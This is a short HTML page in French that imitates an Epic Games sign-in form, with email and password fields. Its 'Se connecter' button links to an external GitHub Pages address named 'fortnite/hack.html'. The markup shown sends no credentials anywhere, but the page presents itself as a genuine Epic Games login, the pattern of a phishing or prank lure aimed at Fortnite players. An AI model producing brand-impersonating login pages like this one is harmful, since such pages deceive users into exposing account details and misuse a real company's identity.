<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion - Epic Games</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 20px;
            background-color: #1c1c1c;
        }
        .login-container {
            background: black;
            padding: 20px;
            border-radius: 10px;
            width: 300px;
            margin: 50px auto;
            box-shadow: 0px 0px 10px #ccc;
        }
        input {
            width: 90%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
            background: white;
        }
        a {
            width: 60%;
            padding: 10px;
            background-color: #0073e6;
            color: white;
            text-decoration: none;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            transition: background 0.3s;
            display: inline-block;
            text-align: center;
        }
        a:hover {
            background-color: #005bb5;
        }
        h2{
            color: white;
        }
    </style>
</head>
<body>

    <div class="login-container">
        <h2>Connexion Epic Games</h2>
        <form>
            <input type="email" placeholder="Email" required>
            <input type="password" placeholder="Mot de passe" required>
            <a href="https://pepperhot.github.io/fortnite/hack.html" class="custom-button">Se connecter</a>
        </form>
    </div>

</body>
</html>
